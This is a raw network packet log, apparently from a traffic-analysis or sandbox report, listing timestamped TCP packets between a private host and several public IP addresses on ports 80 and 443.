Nov 9, 2024 02:47:35.141623020 CET	443	53048	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.175918102 CET	53058	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.175967932 CET	443	53058	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.176057100 CET	53058	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.182435989 CET	53048	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.183978081 CET	53059	443	192.168.2.7	23.198.7.182
Nov 9, 2024 02:47:35.183996916 CET	443	53059	23.198.7.182	192.168.2.7
Nov 9, 2024 02:47:35.184087038 CET	53059	443	192.168.2.7	23.198.7.182
Nov 9, 2024 02:47:35.184952021 CET	53060	443	192.168.2.7	23.198.7.182
Nov 9, 2024 02:47:35.184973001 CET	443	53060	23.198.7.182	192.168.2.7
Nov 9, 2024 02:47:35.185026884 CET	53060	443	192.168.2.7	23.198.7.182
Nov 9, 2024 02:47:35.185339928 CET	53059	443	192.168.2.7	23.198.7.182
Nov 9, 2024 02:47:35.185358047 CET	443	53059	23.198.7.182	192.168.2.7
Nov 9, 2024 02:47:35.185673952 CET	53060	443	192.168.2.7	23.198.7.182
Nov 9, 2024 02:47:35.185686111 CET	443	53060	23.198.7.182	192.168.2.7
Nov 9, 2024 02:47:35.188848019 CET	53058	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.188868046 CET	443	53058	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.204292059 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.204298973 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.204308987 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.204339027 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.204344988 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.204356909 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.204399109 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.204463005 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.204792976 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.204803944 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.204807043 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.204812050 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.204818964 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.204823971 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.204828978 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.204839945 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.204849005 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.204853058 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.204854012 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.204870939 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.204876900 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.204883099 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.204905987 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.204924107 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.204936981 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.204943895 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.204958916 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.204992056 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.205018997 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205044985 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.205080032 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205081940 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.205085993 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205097914 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205104113 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205108881 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205116034 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205121040 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205125093 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.205148935 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.205180883 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.205224037 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205229044 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205234051 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205269098 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205274105 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205280066 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205285072 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205296993 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.205317020 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.205355883 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.205368996 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205399990 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205404997 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205420971 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.205427885 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205432892 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205451012 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.205476999 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.205476999 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205492973 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205502987 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205511093 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205532074 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205538988 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.205569983 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.205600977 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205607891 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205647945 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.205651999 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205657959 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205667973 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205707073 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.205722094 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.205797911 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205811024 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205821991 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205846071 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205852032 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.205856085 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.205894947 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.205969095 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206008911 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206015110 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206018925 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.206053019 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.206063032 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206069946 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206075907 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206077099 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.206108093 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.206114054 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206134081 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.206139088 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206146002 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206159115 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.206178904 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.206186056 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206192017 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206196070 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.206234932 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.206326008 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206377029 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.206386089 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206392050 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206451893 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.206487894 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206501007 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206506968 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206511021 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206516027 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206523895 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206530094 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206535101 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206537962 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.206551075 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206564903 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.206592083 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.206614971 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.206710100 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206741095 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206744909 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206753969 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.206794024 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206796885 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.206800938 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206814051 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206818104 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206850052 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.206862926 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.206926107 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.206952095 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.207075119 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.207079887 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.207110882 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.207117081 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.207159042 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.207159042 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.207192898 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.207199097 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.207211018 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.207221985 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.207236052 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.207241058 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.207243919 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.207271099 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.207290888 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.207449913 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.207487106 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.207492113 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.207534075 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.207540035 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.207547903 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.207551956 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.207598925 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.207827091 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.207833052 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.207876921 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.207889080 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.207912922 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.207918882 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.207931042 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.207950115 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.207957029 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.207979918 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.208007097 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.208035946 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208040953 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208055973 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208077908 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208080053 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.208086967 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208102942 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.208122969 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.208235025 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208241940 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208252907 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208308935 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.208322048 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208369970 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208376884 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208411932 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.208441973 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.208455086 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208462000 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208473921 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208478928 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208504915 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208511114 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208517075 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208518028 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.208523035 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208529949 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208535910 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208537102 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.208551884 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208568096 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.208591938 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.208686113 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208693027 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208698988 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208728075 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208734035 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208734989 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.208740950 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208764076 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.208791971 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.208877087 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208905935 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208916903 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208923101 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208930016 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.208930016 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.208978891 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.208978891 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.209060907 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.209076881 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.209084034 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.209089041 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.209095001 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.209115982 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.209132910 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.209145069 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.209153891 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.209167004 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.209184885 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.209201097 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.209206104 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.209208012 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.209220886 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.209229946 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.209252119 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.209278107 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.209355116 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.209413052 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.209415913 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.209422112 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.209465981 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.209466934 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.209482908 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.209498882 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.209503889 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.209525108 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.209544897 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.210040092 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210047007 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210056067 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210067987 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210074902 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210079908 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210086107 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210088968 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.210092068 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210099936 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210104942 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210117102 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210122108 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210125923 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.210128069 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210150957 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.210190058 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.210206032 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210220098 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210227013 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210232019 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210237026 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210256100 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.210258961 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210277081 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210278988 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.210305929 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.210334063 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.210418940 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210426092 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210438967 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210444927 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210468054 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.210479975 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210485935 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210500956 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.210506916 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210513115 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210524082 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210530043 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210536003 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210541010 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.210573912 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.210588932 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.210783005 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210805893 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210819006 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210840940 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.210850954 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210860968 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210869074 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.210871935 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210901976 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210907936 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210916996 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.210920095 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210933924 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.210933924 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210943937 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210947990 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.210968018 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.210999966 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.211169958 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.211174965 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.211220026 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.288033009 CET	443	53047	20.99.185.48	192.168.2.7
Nov 9, 2024 02:47:35.288310051 CET	53047	443	192.168.2.7	20.99.185.48
Nov 9, 2024 02:47:35.288331985 CET	443	53047	20.99.185.48	192.168.2.7
Nov 9, 2024 02:47:35.288697004 CET	443	53047	20.99.185.48	192.168.2.7
Nov 9, 2024 02:47:35.289079905 CET	53047	443	192.168.2.7	20.99.185.48
Nov 9, 2024 02:47:35.289158106 CET	443	53047	20.99.185.48	192.168.2.7
Nov 9, 2024 02:47:35.289247990 CET	53047	443	192.168.2.7	20.99.185.48
Nov 9, 2024 02:47:35.301651001 CET	53061	443	192.168.2.7	20.125.209.212
Nov 9, 2024 02:47:35.301661968 CET	443	53061	20.125.209.212	192.168.2.7
Nov 9, 2024 02:47:35.302073956 CET	53061	443	192.168.2.7	20.125.209.212
Nov 9, 2024 02:47:35.302274942 CET	53061	443	192.168.2.7	20.125.209.212
Nov 9, 2024 02:47:35.302284956 CET	443	53061	20.125.209.212	192.168.2.7
Nov 9, 2024 02:47:35.318249941 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.318305016 CET	80	52982	77.220.212.32	192.168.2.7
